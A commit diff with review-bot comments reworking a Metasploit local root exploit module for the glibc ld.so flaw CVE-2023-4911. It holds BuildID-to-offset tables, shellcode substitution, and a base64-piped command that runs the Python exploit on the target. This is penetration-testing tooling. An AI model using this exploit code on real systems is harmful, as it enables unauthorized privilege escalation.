Responded to comments from jvoisin
This commit is contained in:
parent
96241f509a
commit
b86df4820c
@ -58,16 +58,7 @@ TARGETS = {
|
||||
}
|
||||
|
||||
# Magic offsets for build IDs can be found for versions of glibc by disabling ASLR and using the original PoC: https://haxx.in/files/gnu-acme.py
|
||||
BUILD_IDS = {
|
||||
"69c048078b6c51fa8744f3d7cff3b0d9369ffd53": 561,
|
||||
"3602eac894717d56555552c84fc6b0e4d6a4af72": 561,
|
||||
"a99db3715218b641780b04323e4ae5953d68a927": 561,
|
||||
"a8daca28288575ffc8c7641d40901b0148958fb1": 580,
|
||||
"61ef896a699bb1c2e4e231642b2e1688b2f1a61e": 560,
|
||||
"9a9c6aeba5df4178de168e26fe30ddcdab47d374": 580,
|
||||
"e7b1e0ff3d359623538f4ae0ac69b3e8db26b674": 580,
|
||||
"956d98a11b839e3392fa1b367b1e3fdfc3e662f6": 322,
|
||||
}
|
||||
BUILD_IDS = METASPLOIT_BUILD_IDS
|
||||
|
||||
libc = cdll.LoadLibrary("libc.so.6")
|
||||
libc.execve.argtypes = c_char_p, POINTER(c_char_p), POINTER(c_char_p)
|
||||
|
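Review bot: The bare identifier `METASPLOIT_BUILD_IDS` left in place of the dict is a NameError at import time if the substitution in the Ruby module ever fails or is renamed, and the removed "Magic offsets ..." comment was the only explanation of where those values come from. Keep that explanation next to the placeholder so the script stays readable on its own, e.g. `# METASPLOIT_BUILD_IDS is replaced by the msf module with {ld.so BuildID: magic offset}; offsets come from the original PoC (https://haxx.in/files/gnu-acme.py)` above `BUILD_IDS = METASPLOIT_BUILD_IDS`. The enclosing `TARGETS` definition and the code that uses `libc.execve` both lie outside this hunk.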
@ -18,8 +18,15 @@ class MetasploitModule < Msf::Exploit::Local
|
||||
include Msf::Exploit::FileDropper
|
||||
prepend Msf::Exploit::Remote::AutoCheck
|
||||
|
||||
BUILD_IDS = %w[69c048078b6c51fa8744f3d7cff3b0d9369ffd53 3602eac894717d56555552c84fc6b0e4d6a4af72 a99db3715218b641780b04323e4ae5953d68a927 a8daca28288575ffc8c7641d40901b0148958fb1 61ef896a699bb1c2e4e231642b2e1688b2f1a61e 9a9c6aeba5df4178de168e26fe30ddcdab47d374 e7b1e0ff3d359623538f4ae0ac69b3e8db26b674 956d98a11b839e3392fa1b367b1e3fdfc3e662f6]
|
||||
|
||||
BUILD_IDS = {'69c048078b6c51fa8744f3d7cff3b0d9369ffd53' => 561,
|
||||
'3602eac894717d56555552c84fc6b0e4d6a4af72' => 561,
|
||||
'a99db3715218b641780b04323e4ae5953d68a927' => 561,
|
||||
'a8daca28288575ffc8c7641d40901b0148958fb1' => 580,
|
||||
'61ef896a699bb1c2e4e231642b2e1688b2f1a61e' => 560,
|
||||
'9a9c6aeba5df4178de168e26fe30ddcdab47d374' => 580,
|
||||
'e7b1e0ff3d359623538f4ae0ac69b3e8db26b674' => 580,
|
||||
'956d98a11b839e3392fa1b367b1e3fdfc3e662f6' => 322
|
||||
}
|
||||
def initialize(info = {})
|
||||
super(
|
||||
update_info(
|
||||
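Review bot: The new `BUILD_IDS` hash is a mutable constant that is later serialised into the python payload, so it should be frozen, i.e. close it with `}.freeze`, and its purpose is no longer documented now that the explanatory comment lives only in the python file. Add a one-line comment above it such as `# ld.so BuildID => magic offset consumed by cve_2023_4911.py (found with the original PoC at https://haxx.in/files/gnu-acme.py)`. Style-wise the entries would read better one per line under an opening `{` on its own line with aligned rockets. The `class MetasploitModule` header and `def initialize` continue outside this hunk.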
@ -71,7 +78,7 @@ class MetasploitModule < Msf::Exploit::Local
|
||||
'DisclosureDate' => '2023-10-03',
|
||||
'Notes' => {
|
||||
'Stability' => [ CRASH_SAFE, ],
|
||||
'SideEffects' => [ ARTIFACTS_ON_DISK, ],
|
||||
'SideEffects' => [ ],
|
||||
'Reliability' => [ REPEATABLE_SESSION, ]
|
||||
}
|
||||
)
|
||||
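Review bot: Emptying `'SideEffects'` looks inconsistent with the module still including `Msf::Exploit::FileDropper` and with the later `cd(datastore['WritableDir'])` comment saying the python script needs a writable working directory; if the script writes anything there, `ARTIFACTS_ON_DISK` is still accurate and helps operators and defenders gauge the on-host footprint. If nothing is written any more, a short comment saying so, `# the exploit is streamed via stdin and leaves no files behind`, would justify the empty list and FileDropper could go as well. The surrounding `initialize` body starts and ends outside this hunk.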
@ -116,7 +123,7 @@ class MetasploitModule < Msf::Exploit::Local
|
||||
|
||||
def check_ld_so_build_id
|
||||
# Check to ensure the python exploit has the magic offset defined for the BuildID for ld.so
|
||||
if command_exists?('file ')
|
||||
if command_exists?('file')
|
||||
file_cmd_output = ''
|
||||
|
||||
# This needs to be split up by distro as Ubuntu has readlink and which installed by default but "ld.so" is not
|
||||
@ -128,14 +135,14 @@ class MetasploitModule < Msf::Exploit::Local
|
||||
(file_cmd_output = cmd_exec('file $(ldconfig -p | grep -oE "/.*ld-linux.*so\.[0-9]*")'))
|
||||
end
|
||||
when 'debian'
|
||||
(file_cmd_output = cmd_exec('file "$(readlink -f "$(command -v ld.so)")"'))
|
||||
(file_cmd_output = cmd_exec('file "$(readlink -f "$(command -v ld.so)")"'))
|
||||
else
|
||||
fail_with(Failure::NoTarget, 'The module has not been tested against this Linux distribution')
|
||||
end
|
||||
|
||||
if file_cmd_output =~ /BuildID\[.+\]=(\w+),/
|
||||
build_id = Regexp.last_match(1)
|
||||
if BUILD_IDS.include?(build_id)
|
||||
if BUILD_IDS.keys.include?(build_id)
|
||||
print_good("The Build ID for ld.so: #{build_id} is in the list of supported Build IDs for the exploit.")
|
||||
else
|
||||
fail_with(Failure::NoTarget, "The Build ID for ld.so: #{build_id} is not in the list of supported Build IDs for the exploit.")
|
||||
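Review bot: `BUILD_IDS.keys.include?(build_id)` allocates a key array on every call and is the non-idiomatic form of a hash lookup; use `if BUILD_IDS.key?(build_id)` instead. The rest of `check_ld_so_build_id`, including the `file_cmd_output` assignments for the other distributions, starts in the previous hunk and the method closes after this one.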
@ -154,16 +161,17 @@ class MetasploitModule < Msf::Exploit::Local
|
||||
python_binary = find_exec_program
|
||||
fail_with(Failure::NotFound, 'The python binary was not found.') unless python_binary
|
||||
vprint_status("Using '#{python_binary}' to run the exploit")
|
||||
|
||||
|
||||
check_ld_so_build_id
|
||||
|
||||
# The python script assumes the working directory is the one we can write to.
|
||||
cd(datastore['WritableDir'])
|
||||
shell_code = payload.encoded.unpack('H*').first
|
||||
exploit_data = exploit_data('CVE-2023-4911', 'cve_2023_4911.py').gsub('METASPLOIT_SHELL_CODE', shell_code)
|
||||
|
||||
exploit_data = exploit_data('CVE-2023-4911', 'cve_2023_4911.py').gsub('METASPLOIT_SHELL_CODE', shell_code).gsub('METASPLOIT_BUILD_IDS', BUILD_IDS.to_s.gsub('=>', ':'))
|
||||
|
||||
# If there is no response from cmd_exec after the brief 15s timeout, this indicates exploit is running successfully
|
||||
output = cmd_exec("$(echo #{Rex::Text.encode_base64(exploit_data)} |base64 -d | #{python_binary})")
|
||||
output = cmd_exec("echo #{Rex::Text.encode_base64(exploit_data)} |base64 -d | #{python_binary}")
|
||||
if output.blank?
|
||||
print_good('The exploit is running. Please be patient. Receiving a session could take up to 10 minutes.')
|
||||
else
|
||||
|
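Review bot: `BUILD_IDS.to_s.gsub('=>', ':')` generates python source from Ruby's `Hash#inspect` output, which is an implementation detail (its spacing already changed in Ruby 3.4) and also rewrites any `=>` inside a key; build the literal explicitly instead, e.g. `.gsub('METASPLOIT_BUILD_IDS', JSON.generate(BUILD_IDS))` (a JSON object of string keys and integer values is a valid python dict literal and `json` should already be loaded by the framework) or `.gsub('METASPLOIT_BUILD_IDS', "{#{BUILD_IDS.map { |id, off| "'#{id}': #{off}" }.join(', ')}}")`. A short comment on that line, `# placeholders are substituted before the script is streamed to python`, would help the next reader. The `exploit` method body continues past this hunk.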